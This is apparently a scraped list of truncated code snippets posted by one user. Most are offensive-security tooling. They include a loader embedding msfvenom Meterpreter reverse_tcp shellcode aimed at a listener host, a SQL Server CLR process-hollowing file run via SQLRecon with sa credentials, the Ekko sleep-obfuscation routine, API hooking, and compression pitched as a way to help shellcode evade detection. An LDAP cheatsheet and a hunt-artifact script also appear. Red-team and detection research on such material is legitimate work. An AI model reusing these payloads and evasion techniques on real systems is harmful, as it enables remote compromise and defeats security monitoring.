sunnyneo

#include <windows.h>

int main() {
    HANDLE file = CreateFileA(".\\test.txt", GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL|FILE_ATTRIBUTE_ENCRYPTED|FILE_FLAG_DELETE_ON_CLOSE, NULL);
    if (!file || file == INVALID_HANDLE_VALUE) {
        return GetLastError();
    }
    CloseHandle(file);
    return 0;
}

sunnyneo

/**
    Compression using undocumented API in rdpbase.dll

    RDPCompressEx supports four algorithms : MPPC-8K, MPPC-64K, NCRUSH and XCRUSH.

    This code supports all except NCRUSH.
    The MPPC compression ratio is very similar to LZSS, so this could be quite useful for shellcode trying to evade detection.
    
    NCRUSH compression appears to work but fails for decompression.

sunnyneo

using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.CompilerServices;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
namespace Test
{
    // CCOB IS THE GOAT

sunnyneo

#include <Core.h>
#include <Win32.h>
#include <Structs.h>
#include <Sleep.h>
#include <Utils.h>

SEC( text, C ) VOID Ekko ( DWORD SleepTime, PINSTANCE Instance)

{

sunnyneo

//C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\hollow.cs
//SQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m clr -o c:\temp\hollow.dll -f BaconTime
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using Microsoft.SqlServer.Server;

sunnyneo

#include <windows.h>
#include <stdio.h>

extern WORD WINAPI RtlRunOnceExecuteOnce(RTL_RUN_ONCE *once, PRTL_RUN_ONCE_INIT_FN func, void *param, void **context);
typedef ULONG (WINAPI* RTL_RUN_ONCE_INIT_FN)(_Inout_ PRTL_RUN_ONCE RunOnce, _Inout_opt_ PVOID Parameter, _Inout_opt_ PVOID *Context);

// msfvenom LPORT=8080 LHOST=172.16.219.1 -p windows/x64/meterpreter/reverse_tcp -f c
unsigned char shellcode_bin[] = 
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"

sunnyneo

using System;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;

namespace ShittyHook
{
    internal class Program
    {

sunnyneo

title	author	date	source	notoc
LDAP Search Filter Cheatsheet	Jon LaBelle	January 4, 2021	https://jonlabelle.com/snippets/view/markdown/ldap-search-filter-cheatsheet	true

LDAP Search Filter Cheatsheet

sunnyneo

Instructions

The following script is designed to create artifacts that teams can use to hunt, new or interesting capabilities.

The following table top is based on the code here: https://github.com/code-scrap/DynamicWrapperDotNet

This script is self-contained. It should dynamically write a DLL to disk and load it in to cscript.exe

To Invoke cscript.exe stranger_things.js This example expects a 64bit system.

sunnyneo

// Copyright (C) 2022 Evan McBroom
// If you are using Visual Studio, you will need to disable the "Edit and Continue" feature.

// Prng based off of Parker Miller's
// "Multiplicative Linear Congruential Generator"
// https://en.wikipedia.org/wiki/Lehmer_random_number_generator
namespace mlcg {
    constexpr uint32_t modulus() {
        return 0x7fffffff;
    }